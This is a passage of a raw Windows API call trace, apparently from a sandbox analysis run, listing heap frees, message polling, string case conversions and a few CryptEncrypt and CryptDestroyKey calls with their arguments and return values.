HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0242.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0242.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0242.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0242.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0242.781] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0242.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0242.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0242.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0242.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0242.782] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0242.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0242.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0242.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0242.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0242.782] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.782] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0242.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0242.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0242.782] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0242.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0242.782] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0242.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0242.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0242.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0242.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0242.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0242.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0242.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0242.783] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0242.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0242.783] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0242.783] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0242.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0242.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0242.783] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0242.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0242.783] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0242.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0242.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0242.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0242.783] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0242.783] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0242.783] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0242.784] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0242.784] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0242.784] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0242.784] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0242.784] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0242.784] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0242.784] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0242.784] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0242.784] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.784] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.784] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.784] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.784] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0242.784] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0242.784] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0242.784] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0242.785] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0242.785] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0242.785] CryptEncrypt (in: hKey=0xaa5920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x8) returned 1 [0242.785] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.785] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.785] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.785] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.785] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0242.785] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.785] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.785] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0242.785] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0242.785] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0242.785] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0242.786] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0242.786] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0242.786] CryptEncrypt (in: hKey=0xaa5920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24b16b8*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x8 | out: pbData=0x24b16b8*, pdwDataLen=0x8bef68*=0x8) returned 1 [0242.786] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.786] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.786] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.786] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.786] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.786] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.786] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.786] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0242.786] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0242.786] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0242.786] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0242.786] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0242.787] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0242.787] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0242.787] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0242.787] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0242.787] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0242.787] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0242.787] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0242.787] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0242.787] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0242.787] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0242.787] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0242.787] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0242.787] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0242.787] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0242.787] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.787] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0242.787] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0242.788] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0242.790] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0242.790] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0242.790] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0242.790] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0242.790] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0242.790] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0242.790] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0242.790] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0242.790] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0242.790] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0242.791] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0242.791] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0242.791] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0242.791] CryptDestroyKey (hKey=0xaa5920) returned 1 [0242.791] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0242.791] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0242.791] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0242.791] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0242.791] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0242.791] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0242.791] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0242.791] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0242.791] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0242.791] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0242.791] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0242.791] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0242.792] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0242.792] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0242.793] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0242.793] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0242.793] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0242.793] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0242.793] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0242.793] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0242.793] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0242.793] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0242.793] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0242.793] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0242.793] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0242.793] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0242.793] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0242.793] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0242.793] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0242.793] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0242.794] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0242.794] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0242.794] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0242.794] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0242.794] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0242.794] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0242.794] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0242.794] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0242.794] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0242.794] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0242.794] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0242.794] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0242.794] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0242.794] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0242.794] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0242.795] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0242.795] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0242.795] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0242.795] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0242.795] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0242.795] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0242.795] PeekMessageW (in: lpMsg=0x8bf140, 